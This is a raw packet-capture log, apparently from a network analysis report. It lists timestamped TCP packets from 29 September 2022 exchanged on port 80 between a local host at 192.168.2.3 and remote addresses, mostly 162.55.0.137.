                                                                                                                                                Sep 29, 2022 14:50:22.174588919 CEST4979180192.168.2.3162.55.0.137
                                                                                                                                                Sep 29, 2022 14:50:22.190680981 CEST4979180192.168.2.3162.55.0.137
                                                                                                                                                Sep 29, 2022 14:50:23.749490976 CEST4979180192.168.2.3162.55.0.137
                                                                                                                                                Sep 29, 2022 14:50:23.772872925 CEST8049791162.55.0.137192.168.2.3
                                                                                                                                                Sep 29, 2022 14:50:23.772924900 CEST8049791162.55.0.137192.168.2.3
                                                                                                                                                Sep 29, 2022 14:50:23.772950888 CEST8049791162.55.0.137192.168.2.3
                                                                                                                                                Sep 29, 2022 14:50:23.773000956 CEST8049791162.55.0.137192.168.2.3
                                                                                                                                                Sep 29, 2022 14:50:23.773029089 CEST8049791162.55.0.137192.168.2.3
                                                                                                                                                Sep 29, 2022 14:50:23.773056984 CEST8049791162.55.0.137192.168.2.3
                                                                                                                                                Sep 29, 2022 14:50:23.784116983 CEST4979180192.168.2.3162.55.0.137
                                                                                                                                                Sep 29, 2022 14:50:24.409531116 CEST4979180192.168.2.3162.55.0.137
                                                                                                                                                Sep 29, 2022 14:50:24.434510946 CEST8049791162.55.0.137192.168.2.3
                                                                                                                                                Sep 29, 2022 14:50:24.434545040 CEST8049791162.55.0.137192.168.2.3
                                                                                                                                                Sep 29, 2022 14:50:24.434565067 CEST8049791162.55.0.137192.168.2.3
                                                                                                                                                Sep 29, 2022 14:50:24.434585094 CEST8049791162.55.0.137192.168.2.3
                                                                                                                                                Sep 29, 2022 14:50:24.434603930 CEST8049791162.55.0.137192.168.2.3
                                                                                                                                                Sep 29, 2022 14:50:24.434624910 CEST8049791162.55.0.137192.168.2.3
                                                                                                                                                Sep 29, 2022 14:50:24.437175035 CEST4979180192.168.2.3162.55.0.137
                                                                                                                                                Sep 29, 2022 14:50:25.417577028 CEST4979180192.168.2.3162.55.0.137
                                                                                                                                                Sep 29, 2022 14:50:25.440993071 CEST8049791162.55.0.137192.168.2.3
                                                                                                                                                Sep 29, 2022 14:50:25.441061974 CEST8049791162.55.0.137192.168.2.3
                                                                                                                                                Sep 29, 2022 14:50:25.441106081 CEST8049791162.55.0.137192.168.2.3
                                                                                                                                                Sep 29, 2022 14:50:25.441150904 CEST8049791162.55.0.137192.168.2.3
                                                                                                                                                Sep 29, 2022 14:50:25.441194057 CEST8049791162.55.0.137192.168.2.3
                                                                                                                                                Sep 29, 2022 14:50:25.441236973 CEST8049791162.55.0.137192.168.2.3
                                                                                                                                                Sep 29, 2022 14:50:25.441627026 CEST4979180192.168.2.3162.55.0.137
                                                                                                                                                Sep 29, 2022 14:50:26.108197927 CEST4979180192.168.2.3162.55.0.137
                                                                                                                                                Sep 29, 2022 14:50:26.131565094 CEST8049791162.55.0.137192.168.2.3
                                                                                                                                                Sep 29, 2022 14:50:26.131627083 CEST8049791162.55.0.137192.168.2.3
                                                                                                                                                Sep 29, 2022 14:50:26.131664038 CEST8049791162.55.0.137192.168.2.3
                                                                                                                                                Sep 29, 2022 14:50:26.131697893 CEST8049791162.55.0.137192.168.2.3
                                                                                                                                                Sep 29, 2022 14:50:26.131735086 CEST8049791162.55.0.137192.168.2.3
                                                                                                                                                Sep 29, 2022 14:50:26.131771088 CEST8049791162.55.0.137192.168.2.3
                                                                                                                                                Sep 29, 2022 14:50:26.134735107 CEST4979180192.168.2.3162.55.0.137
                                                                                                                                                Sep 29, 2022 14:50:27.054079056 CEST8049787185.53.177.53192.168.2.3
                                                                                                                                                Sep 29, 2022 14:50:27.071528912 CEST4978780192.168.2.3185.53.177.53
                                                                                                                                                Sep 29, 2022 14:50:27.204166889 CEST4979180192.168.2.3162.55.0.137
                                                                                                                                                Sep 29, 2022 14:50:27.227709055 CEST8049791162.55.0.137192.168.2.3
                                                                                                                                                Sep 29, 2022 14:50:27.227757931 CEST8049791162.55.0.137192.168.2.3
                                                                                                                                                Sep 29, 2022 14:50:27.227791071 CEST8049791162.55.0.137192.168.2.3
                                                                                                                                                Sep 29, 2022 14:50:27.227823973 CEST8049791162.55.0.137192.168.2.3
                                                                                                                                                Sep 29, 2022 14:50:27.227859020 CEST8049791162.55.0.137192.168.2.3
                                                                                                                                                Sep 29, 2022 14:50:27.227894068 CEST8049791162.55.0.137192.168.2.3
                                                                                                                                                Sep 29, 2022 14:50:27.234462023 CEST4979180192.168.2.3162.55.0.137
                                                                                                                                                Sep 29, 2022 14:50:27.242314100 CEST4979180192.168.2.3162.55.0.137
                                                                                                                                                Sep 29, 2022 14:50:28.071696043 CEST4979180192.168.2.3162.55.0.137
                                                                                                                                                Sep 29, 2022 14:50:28.095082045 CEST8049791162.55.0.137192.168.2.3
                                                                                                                                                Sep 29, 2022 14:50:28.095115900 CEST8049791162.55.0.137192.168.2.3
                                                                                                                                                Sep 29, 2022 14:50:28.095132113 CEST8049791162.55.0.137192.168.2.3
                                                                                                                                                Sep 29, 2022 14:50:28.095145941 CEST8049791162.55.0.137192.168.2.3
                                                                                                                                                Sep 29, 2022 14:50:28.095161915 CEST8049791162.55.0.137192.168.2.3
                                                                                                                                                Sep 29, 2022 14:50:28.095177889 CEST8049791162.55.0.137192.168.2.3
                                                                                                                                                Sep 29, 2022 14:50:28.102751970 CEST4979180192.168.2.3162.55.0.137
                                                                                                                                                Sep 29, 2022 14:50:29.091023922 CEST4979180192.168.2.3162.55.0.137
                                                                                                                                                Sep 29, 2022 14:50:29.114398003 CEST8049791162.55.0.137192.168.2.3
                                                                                                                                                Sep 29, 2022 14:50:29.114453077 CEST8049791162.55.0.137192.168.2.3
                                                                                                                                                Sep 29, 2022 14:50:29.114480972 CEST8049791162.55.0.137192.168.2.3
                                                                                                                                                Sep 29, 2022 14:50:29.114507914 CEST8049791162.55.0.137192.168.2.3
                                                                                                                                                Sep 29, 2022 14:50:29.114536047 CEST8049791162.55.0.137192.168.2.3
                                                                                                                                                Sep 29, 2022 14:50:29.114563942 CEST8049791162.55.0.137192.168.2.3
                                                                                                                                                Sep 29, 2022 14:50:29.115019083 CEST4979180192.168.2.3162.55.0.137
                                                                                                                                                Sep 29, 2022 14:50:30.206741095 CEST4979180192.168.2.3162.55.0.137
                                                                                                                                                Sep 29, 2022 14:50:30.230047941 CEST8049791162.55.0.137192.168.2.3
                                                                                                                                                Sep 29, 2022 14:50:30.230101109 CEST8049791162.55.0.137192.168.2.3
                                                                                                                                                Sep 29, 2022 14:50:30.230134010 CEST8049791162.55.0.137192.168.2.3
                                                                                                                                                Sep 29, 2022 14:50:30.230170012 CEST8049791162.55.0.137192.168.2.3
                                                                                                                                                Sep 29, 2022 14:50:30.230178118 CEST4979180192.168.2.3162.55.0.137
                                                                                                                                                Sep 29, 2022 14:50:30.230206966 CEST8049791162.55.0.137192.168.2.3
                                                                                                                                                Sep 29, 2022 14:50:30.230215073 CEST4979180192.168.2.3162.55.0.137
                                                                                                                                                Sep 29, 2022 14:50:30.230243921 CEST8049791162.55.0.137192.168.2.3
                                                                                                                                                Sep 29, 2022 14:50:30.230287075 CEST4979180192.168.2.3162.55.0.137
                                                                                                                                                Sep 29, 2022 14:50:31.132781982 CEST4979180192.168.2.3162.55.0.137
                                                                                                                                                Sep 29, 2022 14:50:31.156063080 CEST8049791162.55.0.137192.168.2.3
                                                                                                                                                Sep 29, 2022 14:50:31.156110048 CEST8049791162.55.0.137192.168.2.3
                                                                                                                                                Sep 29, 2022 14:50:31.156130075 CEST8049791162.55.0.137192.168.2.3
                                                                                                                                                Sep 29, 2022 14:50:31.156148911 CEST8049791162.55.0.137192.168.2.3
                                                                                                                                                Sep 29, 2022 14:50:31.156168938 CEST8049791162.55.0.137192.168.2.3
                                                                                                                                                Sep 29, 2022 14:50:31.156188011 CEST8049791162.55.0.137192.168.2.3
                                                                                                                                                Sep 29, 2022 14:50:31.156302929 CEST4979180192.168.2.3162.55.0.137
                                                                                                                                                Sep 29, 2022 14:50:31.156333923 CEST4979180192.168.2.3162.55.0.137
                                                                                                                                                Sep 29, 2022 14:50:32.181581020 CEST4979180192.168.2.3162.55.0.137
                                                                                                                                                Sep 29, 2022 14:50:32.204792976 CEST8049791162.55.0.137192.168.2.3
                                                                                                                                                Sep 29, 2022 14:50:32.204828978 CEST8049791162.55.0.137192.168.2.3
                                                                                                                                                Sep 29, 2022 14:50:32.204848051 CEST8049791162.55.0.137192.168.2.3
                                                                                                                                                Sep 29, 2022 14:50:32.204866886 CEST8049791162.55.0.137192.168.2.3
                                                                                                                                                Sep 29, 2022 14:50:32.204885006 CEST8049791162.55.0.137192.168.2.3
                                                                                                                                                Sep 29, 2022 14:50:32.204902887 CEST8049791162.55.0.137192.168.2.3
                                                                                                                                                Sep 29, 2022 14:50:32.205013037 CEST4979180192.168.2.3162.55.0.137
                                                                                                                                                Sep 29, 2022 14:50:32.205040932 CEST4979180192.168.2.3162.55.0.137
                                                                                                                                                Sep 29, 2022 14:50:33.030284882 CEST4979180192.168.2.3162.55.0.137
                                                                                                                                                Sep 29, 2022 14:50:33.053590059 CEST8049791162.55.0.137192.168.2.3
                                                                                                                                                Sep 29, 2022 14:50:33.053621054 CEST8049791162.55.0.137192.168.2.3
                                                                                                                                                Sep 29, 2022 14:50:33.053641081 CEST8049791162.55.0.137192.168.2.3
                                                                                                                                                Sep 29, 2022 14:50:33.053658962 CEST8049791162.55.0.137192.168.2.3
                                                                                                                                                Sep 29, 2022 14:50:33.053679943 CEST8049791162.55.0.137192.168.2.3
                                                                                                                                                Sep 29, 2022 14:50:33.053700924 CEST8049791162.55.0.137192.168.2.3
                                                                                                                                                Sep 29, 2022 14:50:33.053761959 CEST4979180192.168.2.3162.55.0.137
                                                                                                                                                Sep 29, 2022 14:50:33.053821087 CEST4979180192.168.2.3162.55.0.137
                                                                                                                                                Sep 29, 2022 14:50:34.034821033 CEST4979180192.168.2.3162.55.0.137
                                                                                                                                                Sep 29, 2022 14:50:34.058094978 CEST8049791162.55.0.137192.168.2.3
                                                                                                                                                Sep 29, 2022 14:50:34.058126926 CEST8049791162.55.0.137192.168.2.3
                                                                                                                                                Sep 29, 2022 14:50:34.058146954 CEST8049791162.55.0.137192.168.2.3
                                                                                                                                                Sep 29, 2022 14:50:34.058165073 CEST8049791162.55.0.137192.168.2.3
                                                                                                                                                Sep 29, 2022 14:50:34.058186054 CEST8049791162.55.0.137192.168.2.3
                                                                                                                                                Sep 29, 2022 14:50:34.058212996 CEST8049791162.55.0.137192.168.2.3
                                                                                                                                                Sep 29, 2022 14:50:34.058227062 CEST4979180192.168.2.3162.55.0.137
                                                                                                                                                Sep 29, 2022 14:50:34.058228016 CEST4979180192.168.2.3162.55.0.137
                                                                                                                                                Sep 29, 2022 14:50:34.058274031 CEST4979180192.168.2.3162.55.0.137
                                                                                                                                                Sep 29, 2022 14:50:35.031223059 CEST4979180192.168.2.3162.55.0.137
                                                                                                                                                Sep 29, 2022 14:50:35.054543972 CEST8049791162.55.0.137192.168.2.3
                                                                                                                                                Sep 29, 2022 14:50:35.054582119 CEST8049791162.55.0.137192.168.2.3
                                                                                                                                                Sep 29, 2022 14:50:35.054600954 CEST8049791162.55.0.137192.168.2.3
                                                                                                                                                Sep 29, 2022 14:50:35.054622889 CEST8049791162.55.0.137192.168.2.3
                                                                                                                                                Sep 29, 2022 14:50:35.054646015 CEST8049791162.55.0.137192.168.2.3
                                                                                                                                                Sep 29, 2022 14:50:35.054657936 CEST4979180192.168.2.3162.55.0.137
                                                                                                                                                Sep 29, 2022 14:50:35.054666996 CEST8049791162.55.0.137192.168.2.3
                                                                                                                                                Sep 29, 2022 14:50:35.054696083 CEST4979180192.168.2.3162.55.0.137
                                                                                                                                                Sep 29, 2022 14:50:35.054744005 CEST4979180192.168.2.3162.55.0.137
                                                                                                                                                Sep 29, 2022 14:50:36.119786978 CEST4979180192.168.2.3162.55.0.137
                                                                                                                                                Sep 29, 2022 14:50:36.143098116 CEST8049791162.55.0.137192.168.2.3
                                                                                                                                                Sep 29, 2022 14:50:36.143150091 CEST8049791162.55.0.137192.168.2.3
                                                                                                                                                Sep 29, 2022 14:50:36.143168926 CEST8049791162.55.0.137192.168.2.3
                                                                                                                                                Sep 29, 2022 14:50:36.143193007 CEST8049791162.55.0.137192.168.2.3
                                                                                                                                                Sep 29, 2022 14:50:36.143213034 CEST8049791162.55.0.137192.168.2.3
                                                                                                                                                Sep 29, 2022 14:50:36.143233061 CEST8049791162.55.0.137192.168.2.3
                                                                                                                                                Sep 29, 2022 14:50:36.143249035 CEST4979180192.168.2.3162.55.0.137
                                                                                                                                                Sep 29, 2022 14:50:36.143290043 CEST4979180192.168.2.3162.55.0.137
                                                                                                                                                Sep 29, 2022 14:50:36.143305063 CEST4979180192.168.2.3162.55.0.137
                                                                                                                                                Sep 29, 2022 14:50:37.048186064 CEST4979180192.168.2.3162.55.0.137
                                                                                                                                                Sep 29, 2022 14:50:37.071418047 CEST8049791162.55.0.137192.168.2.3
                                                                                                                                                Sep 29, 2022 14:50:37.071448088 CEST8049791162.55.0.137192.168.2.3
                                                                                                                                                Sep 29, 2022 14:50:37.071465969 CEST8049791162.55.0.137192.168.2.3
                                                                                                                                                Sep 29, 2022 14:50:37.071485043 CEST8049791162.55.0.137192.168.2.3
                                                                                                                                                Sep 29, 2022 14:50:37.071507931 CEST8049791162.55.0.137192.168.2.3
                                                                                                                                                Sep 29, 2022 14:50:37.071527958 CEST8049791162.55.0.137192.168.2.3
                                                                                                                                                Sep 29, 2022 14:50:37.071537018 CEST4979180192.168.2.3162.55.0.137
                                                                                                                                                Sep 29, 2022 14:50:37.071602106 CEST4979180192.168.2.3162.55.0.137
                                                                                                                                                Sep 29, 2022 14:50:37.071625948 CEST4979180192.168.2.3162.55.0.137
                                                                                                                                                Sep 29, 2022 14:50:38.023087025 CEST4979180192.168.2.3162.55.0.137
                                                                                                                                                Sep 29, 2022 14:50:38.046431065 CEST8049791162.55.0.137192.168.2.3
                                                                                                                                                Sep 29, 2022 14:50:38.046478033 CEST8049791162.55.0.137192.168.2.3
                                                                                                                                                Sep 29, 2022 14:50:38.046510935 CEST8049791162.55.0.137192.168.2.3
                                                                                                                                                Sep 29, 2022 14:50:38.046539068 CEST8049791162.55.0.137192.168.2.3
                                                                                                                                                Sep 29, 2022 14:50:38.046572924 CEST8049791162.55.0.137192.168.2.3
                                                                                                                                                Sep 29, 2022 14:50:38.046596050 CEST4979180192.168.2.3162.55.0.137
                                                                                                                                                Sep 29, 2022 14:50:38.046628952 CEST8049791162.55.0.137192.168.2.3
                                                                                                                                                Sep 29, 2022 14:50:38.046641111 CEST4979180192.168.2.3162.55.0.137
                                                                                                                                                Sep 29, 2022 14:50:38.046669960 CEST4979180192.168.2.3162.55.0.137
                                                                                                                                                Sep 29, 2022 14:50:39.038909912 CEST4979180192.168.2.3162.55.0.137
                                                                                                                                                Sep 29, 2022 14:50:39.063692093 CEST8049791162.55.0.137192.168.2.3
                                                                                                                                                Sep 29, 2022 14:50:39.063728094 CEST8049791162.55.0.137192.168.2.3
                                                                                                                                                Sep 29, 2022 14:50:39.063754082 CEST8049791162.55.0.137192.168.2.3
                                                                                                                                                Sep 29, 2022 14:50:39.063780069 CEST8049791162.55.0.137192.168.2.3
                                                                                                                                                Sep 29, 2022 14:50:39.063808918 CEST8049791162.55.0.137192.168.2.3
                                                                                                                                                Sep 29, 2022 14:50:39.063838005 CEST8049791162.55.0.137192.168.2.3
                                                                                                                                                Sep 29, 2022 14:50:39.063890934 CEST4979180192.168.2.3162.55.0.137
                                                                                                                                                Sep 29, 2022 14:50:39.063918114 CEST4979180192.168.2.3162.55.0.137
                                                                                                                                                Sep 29, 2022 14:50:40.041781902 CEST4979180192.168.2.3162.55.0.137
                                                                                                                                                Sep 29, 2022 14:50:40.064951897 CEST8049791162.55.0.137192.168.2.3
                                                                                                                                                Sep 29, 2022 14:50:40.064975977 CEST8049791162.55.0.137192.168.2.3
                                                                                                                                                Sep 29, 2022 14:50:40.064996004 CEST8049791162.55.0.137192.168.2.3
                                                                                                                                                Sep 29, 2022 14:50:40.065010071 CEST8049791162.55.0.137192.168.2.3
                                                                                                                                                Sep 29, 2022 14:50:40.065032005 CEST8049791162.55.0.137192.168.2.3
                                                                                                                                                Sep 29, 2022 14:50:40.065052032 CEST8049791162.55.0.137192.168.2.3
                                                                                                                                                Sep 29, 2022 14:50:40.065155983 CEST4979180192.168.2.3162.55.0.137
                                                                                                                                                Sep 29, 2022 14:50:40.065155983 CEST4979180192.168.2.3162.55.0.137
                                                                                                                                                Sep 29, 2022 14:50:41.268867970 CEST4979180192.168.2.3162.55.0.137
                                                                                                                                                Sep 29, 2022 14:50:41.292289019 CEST8049791162.55.0.137192.168.2.3
                                                                                                                                                Sep 29, 2022 14:50:41.292336941 CEST8049791162.55.0.137192.168.2.3
                                                                                                                                                Sep 29, 2022 14:50:41.292363882 CEST8049791162.55.0.137192.168.2.3
                                                                                                                                                Sep 29, 2022 14:50:41.292390108 CEST8049791162.55.0.137192.168.2.3
                                                                                                                                                Sep 29, 2022 14:50:41.292418957 CEST4979180192.168.2.3162.55.0.137
                                                                                                                                                Sep 29, 2022 14:50:41.292439938 CEST4979180192.168.2.3162.55.0.137
                                                                                                                                                Sep 29, 2022 14:50:41.292454958 CEST8049791162.55.0.137192.168.2.3
                                                                                                                                                Sep 29, 2022 14:50:41.292480946 CEST8049791162.55.0.137192.168.2.3
                                                                                                                                                Sep 29, 2022 14:50:41.292521000 CEST4979180192.168.2.3162.55.0.137
                                                                                                                                                Sep 29, 2022 14:50:42.327028036 CEST4979180192.168.2.3162.55.0.137
                                                                                                                                                Sep 29, 2022 14:50:42.350498915 CEST8049791162.55.0.137192.168.2.3
                                                                                                                                                Sep 29, 2022 14:50:42.350548983 CEST8049791162.55.0.137192.168.2.3
                                                                                                                                                Sep 29, 2022 14:50:42.350572109 CEST8049791162.55.0.137192.168.2.3
                                                                                                                                                Sep 29, 2022 14:50:42.350598097 CEST8049791162.55.0.137192.168.2.3
                                                                                                                                                Sep 29, 2022 14:50:42.350622892 CEST8049791162.55.0.137192.168.2.3
                                                                                                                                                Sep 29, 2022 14:50:42.350649118 CEST8049791162.55.0.137192.168.2.3
                                                                                                                                                Sep 29, 2022 14:50:42.350733042 CEST4979180192.168.2.3162.55.0.137
                                                                                                                                                Sep 29, 2022 14:50:42.350733042 CEST4979180192.168.2.3162.55.0.137
                                                                                                                                                Sep 29, 2022 14:50:43.164359093 CEST4979180192.168.2.3162.55.0.137
                                                                                                                                                Sep 29, 2022 14:50:43.187644005 CEST8049791162.55.0.137192.168.2.3
                                                                                                                                                Sep 29, 2022 14:50:43.187674999 CEST8049791162.55.0.137192.168.2.3
                                                                                                                                                Sep 29, 2022 14:50:43.187689066 CEST8049791162.55.0.137192.168.2.3
                                                                                                                                                Sep 29, 2022 14:50:43.187701941 CEST8049791162.55.0.137192.168.2.3
                                                                                                                                                Sep 29, 2022 14:50:43.187716007 CEST8049791162.55.0.137192.168.2.3
                                                                                                                                                Sep 29, 2022 14:50:43.187731028 CEST8049791162.55.0.137192.168.2.3
                                                                                                                                                Sep 29, 2022 14:50:43.187927008 CEST4979180192.168.2.3162.55.0.137
                                                                                                                                                Sep 29, 2022 14:50:44.164870024 CEST4979180192.168.2.3162.55.0.137
                                                                                                                                                Sep 29, 2022 14:50:44.188249111 CEST8049791162.55.0.137192.168.2.3
                                                                                                                                                Sep 29, 2022 14:50:44.188327074 CEST8049791162.55.0.137192.168.2.3
                                                                                                                                                Sep 29, 2022 14:50:44.188400030 CEST8049791162.55.0.137192.168.2.3
                                                                                                                                                Sep 29, 2022 14:50:44.188419104 CEST4979180192.168.2.3162.55.0.137
                                                                                                                                                Sep 29, 2022 14:50:44.188494921 CEST8049791162.55.0.137192.168.2.3
                                                                                                                                                Sep 29, 2022 14:50:44.188551903 CEST4979180192.168.2.3162.55.0.137
                                                                                                                                                Sep 29, 2022 14:50:44.188585997 CEST8049791162.55.0.137192.168.2.3
                                                                                                                                                Sep 29, 2022 14:50:44.188652039 CEST8049791162.55.0.137192.168.2.3
                                                                                                                                                Sep 29, 2022 14:50:44.188714027 CEST4979180192.168.2.3162.55.0.137
                                                                                                                                                Sep 29, 2022 14:50:45.162537098 CEST4979180192.168.2.3162.55.0.137
                                                                                                                                                Sep 29, 2022 14:50:45.187611103 CEST8049791162.55.0.137192.168.2.3
                                                                                                                                                Sep 29, 2022 14:50:45.187639952 CEST8049791162.55.0.137192.168.2.3
                                                                                                                                                Sep 29, 2022 14:50:45.187658072 CEST8049791162.55.0.137192.168.2.3
                                                                                                                                                Sep 29, 2022 14:50:45.187676907 CEST8049791162.55.0.137192.168.2.3
                                                                                                                                                Sep 29, 2022 14:50:45.187694073 CEST8049791162.55.0.137192.168.2.3
                                                                                                                                                Sep 29, 2022 14:50:45.187712908 CEST8049791162.55.0.137192.168.2.3
                                                                                                                                                Sep 29, 2022 14:50:45.188076019 CEST4979180192.168.2.3162.55.0.137
                                                                                                                                                Sep 29, 2022 14:50:45.188076019 CEST4979180192.168.2.3162.55.0.137
                                                                                                                                                Sep 29, 2022 14:50:46.138906956 CEST4979180192.168.2.3162.55.0.137
                                                                                                                                                Sep 29, 2022 14:50:46.162333012 CEST8049791162.55.0.137192.168.2.3
                                                                                                                                                Sep 29, 2022 14:50:46.162384033 CEST8049791162.55.0.137192.168.2.3
                                                                                                                                                Sep 29, 2022 14:50:46.162410975 CEST8049791162.55.0.137192.168.2.3
                                                                                                                                                Sep 29, 2022 14:50:46.162436008 CEST8049791162.55.0.137192.168.2.3
                                                                                                                                                Sep 29, 2022 14:50:46.162462950 CEST8049791162.55.0.137192.168.2.3
                                                                                                                                                Sep 29, 2022 14:50:46.162493944 CEST4979180192.168.2.3162.55.0.137
                                                                                                                                                Sep 29, 2022 14:50:46.162493944 CEST4979180192.168.2.3162.55.0.137
                                                                                                                                                Sep 29, 2022 14:50:46.162556887 CEST8049791162.55.0.137192.168.2.3
                                                                                                                                                Sep 29, 2022 14:50:46.162911892 CEST4979180192.168.2.3162.55.0.137
                                                                                                                                                Sep 29, 2022 14:50:47.099528074 CEST4979180192.168.2.3162.55.0.137
                                                                                                                                                Sep 29, 2022 14:50:47.123119116 CEST8049791162.55.0.137192.168.2.3
                                                                                                                                                Sep 29, 2022 14:50:47.123183966 CEST8049791162.55.0.137192.168.2.3
                                                                                                                                                Sep 29, 2022 14:50:47.123229027 CEST8049791162.55.0.137192.168.2.3
                                                                                                                                                Sep 29, 2022 14:50:47.123275995 CEST8049791162.55.0.137192.168.2.3
                                                                                                                                                Sep 29, 2022 14:50:47.123322964 CEST8049791162.55.0.137192.168.2.3
                                                                                                                                                Sep 29, 2022 14:50:47.123336077 CEST4979180192.168.2.3162.55.0.137
                                                                                                                                                Sep 29, 2022 14:50:47.123336077 CEST4979180192.168.2.3162.55.0.137
                                                                                                                                                Sep 29, 2022 14:50:47.123366117 CEST8049791162.55.0.137192.168.2.3
                                                                                                                                                Sep 29, 2022 14:50:47.123610020 CEST4979180192.168.2.3162.55.0.137
                                                                                                                                                Sep 29, 2022 14:50:48.160343885 CEST4979180192.168.2.3162.55.0.137
                                                                                                                                                Sep 29, 2022 14:50:48.183430910 CEST8049791162.55.0.137192.168.2.3
                                                                                                                                                Sep 29, 2022 14:50:48.183480024 CEST8049791162.55.0.137192.168.2.3
                                                                                                                                                Sep 29, 2022 14:50:48.183526993 CEST8049791162.55.0.137192.168.2.3
                                                                                                                                                Sep 29, 2022 14:50:48.183566093 CEST4979180192.168.2.3162.55.0.137
                                                                                                                                                Sep 29, 2022 14:50:48.183573008 CEST8049791162.55.0.137192.168.2.3
                                                                                                                                                Sep 29, 2022 14:50:48.183664083 CEST8049791162.55.0.137192.168.2.3
                                                                                                                                                Sep 29, 2022 14:50:48.183717966 CEST8049791162.55.0.137192.168.2.3
                                                                                                                                                Sep 29, 2022 14:50:48.183770895 CEST4979180192.168.2.3162.55.0.137
                                                                                                                                                Sep 29, 2022 14:50:48.183770895 CEST4979180192.168.2.3162.55.0.137
                                                                                                                                                Sep 29, 2022 14:50:49.111691952 CEST4979180192.168.2.3162.55.0.137
                                                                                                                                                Sep 29, 2022 14:50:49.135158062 CEST8049791162.55.0.137192.168.2.3
                                                                                                                                                Sep 29, 2022 14:50:49.135221958 CEST8049791162.55.0.137192.168.2.3
                                                                                                                                                Sep 29, 2022 14:50:49.135266066 CEST8049791162.55.0.137192.168.2.3
                                                                                                                                                Sep 29, 2022 14:50:49.135308981 CEST8049791162.55.0.137192.168.2.3
                                                                                                                                                Sep 29, 2022 14:50:49.135308981 CEST4979180192.168.2.3162.55.0.137
                                                                                                                                                Sep 29, 2022 14:50:49.135344982 CEST8049791162.55.0.137192.168.2.3
                                                                                                                                                Sep 29, 2022 14:50:49.135396004 CEST8049791162.55.0.137192.168.2.3
                                                                                                                                                Sep 29, 2022 14:50:49.135411024 CEST4979180192.168.2.3162.55.0.137
                                                                                                                                                Sep 29, 2022 14:50:49.135442019 CEST4979180192.168.2.3162.55.0.137
                                                                                                                                                Sep 29, 2022 14:50:50.081363916 CEST4979180192.168.2.3162.55.0.137
                                                                                                                                                Sep 29, 2022 14:50:50.104963064 CEST8049791162.55.0.137192.168.2.3
                                                                                                                                                Sep 29, 2022 14:50:50.105052948 CEST8049791162.55.0.137192.168.2.3
                                                                                                                                                Sep 29, 2022 14:50:50.105098963 CEST8049791162.55.0.137192.168.2.3
                                                                                                                                                Sep 29, 2022 14:50:50.105175972 CEST4979180192.168.2.3162.55.0.137
                                                                                                                                                Sep 29, 2022 14:50:50.105185986 CEST8049791162.55.0.137192.168.2.3
                                                                                                                                                Sep 29, 2022 14:50:50.105232000 CEST8049791162.55.0.137192.168.2.3
                                                                                                                                                Sep 29, 2022 14:50:50.105243921 CEST4979180192.168.2.3162.55.0.137
                                                                                                                                                Sep 29, 2022 14:50:50.105283022 CEST8049791162.55.0.137192.168.2.3
                                                                                                                                                Sep 29, 2022 14:50:50.105338097 CEST4979180192.168.2.3162.55.0.137
                                                                                                                                                Sep 29, 2022 14:50:51.117314100 CEST4979180192.168.2.3162.55.0.137
                                                                                                                                                Sep 29, 2022 14:50:51.140835047 CEST8049791162.55.0.137192.168.2.3
                                                                                                                                                Sep 29, 2022 14:50:51.140898943 CEST8049791162.55.0.137192.168.2.3
                                                                                                                                                Sep 29, 2022 14:50:51.140923977 CEST8049791162.55.0.137192.168.2.3
                                                                                                                                                Sep 29, 2022 14:50:51.140948057 CEST8049791162.55.0.137192.168.2.3
                                                                                                                                                Sep 29, 2022 14:50:51.140974998 CEST8049791162.55.0.137192.168.2.3
                                                                                                                                                Sep 29, 2022 14:50:51.140999079 CEST8049791162.55.0.137192.168.2.3
                                                                                                                                                Sep 29, 2022 14:50:51.141062021 CEST4979180192.168.2.3162.55.0.137
                                                                                                                                                Sep 29, 2022 14:50:51.141145945 CEST4979180192.168.2.3162.55.0.137
                                                                                                                                                Sep 29, 2022 14:50:52.160114050 CEST4979180192.168.2.3162.55.0.137
                                                                                                                                                Sep 29, 2022 14:50:52.183609009 CEST8049791162.55.0.137192.168.2.3
                                                                                                                                                Sep 29, 2022 14:50:52.183650970 CEST8049791162.55.0.137192.168.2.3
                                                                                                                                                Sep 29, 2022 14:50:52.183676004 CEST8049791162.55.0.137192.168.2.3
                                                                                                                                                Sep 29, 2022 14:50:52.183701038 CEST8049791162.55.0.137192.168.2.3
                                                                                                                                                Sep 29, 2022 14:50:52.183727026 CEST8049791162.55.0.137192.168.2.3
                                                                                                                                                Sep 29, 2022 14:50:52.183751106 CEST8049791162.55.0.137192.168.2.3
                                                                                                                                                Sep 29, 2022 14:50:52.183782101 CEST4979180192.168.2.3162.55.0.137
                                                                                                                                                Sep 29, 2022 14:50:52.183845997 CEST4979180192.168.2.3162.55.0.137
                                                                                                                                                Sep 29, 2022 14:50:53.166380882 CEST4979180192.168.2.3162.55.0.137
                                                                                                                                                Sep 29, 2022 14:50:53.189707041 CEST8049791162.55.0.137192.168.2.3
                                                                                                                                                Sep 29, 2022 14:50:53.189738035 CEST8049791162.55.0.137192.168.2.3
                                                                                                                                                Sep 29, 2022 14:50:53.189758062 CEST8049791162.55.0.137192.168.2.3
                                                                                                                                                Sep 29, 2022 14:50:53.189775944 CEST8049791162.55.0.137192.168.2.3
                                                                                                                                                Sep 29, 2022 14:50:53.189793110 CEST8049791162.55.0.137192.168.2.3
                                                                                                                                                Sep 29, 2022 14:50:53.189811945 CEST8049791162.55.0.137192.168.2.3
                                                                                                                                                Sep 29, 2022 14:50:53.189872026 CEST4979180192.168.2.3162.55.0.137
                                                                                                                                                Sep 29, 2022 14:50:53.189915895 CEST4979180192.168.2.3162.55.0.137
                                                                                                                                                Sep 29, 2022 14:50:54.091962099 CEST4979180192.168.2.3162.55.0.137
                                                                                                                                                Sep 29, 2022 14:50:54.115302086 CEST8049791162.55.0.137192.168.2.3
                                                                                                                                                Sep 29, 2022 14:50:54.115356922 CEST8049791162.55.0.137192.168.2.3
                                                                                                                                                Sep 29, 2022 14:50:54.115387917 CEST8049791162.55.0.137192.168.2.3
                                                                                                                                                Sep 29, 2022 14:50:54.115417004 CEST8049791162.55.0.137192.168.2.3
                                                                                                                                                Sep 29, 2022 14:50:54.115451097 CEST8049791162.55.0.137192.168.2.3
                                                                                                                                                Sep 29, 2022 14:50:54.115479946 CEST8049791162.55.0.137192.168.2.3
                                                                                                                                                Sep 29, 2022 14:50:54.115541935 CEST4979180192.168.2.3162.55.0.137
                                                                                                                                                Sep 29, 2022 14:50:54.115541935 CEST4979180192.168.2.3162.55.0.137
                                                                                                                                                Sep 29, 2022 14:50:54.115541935 CEST4979180192.168.2.3162.55.0.137
                                                                                                                                                Sep 29, 2022 14:50:55.085396051 CEST4979180192.168.2.3162.55.0.137
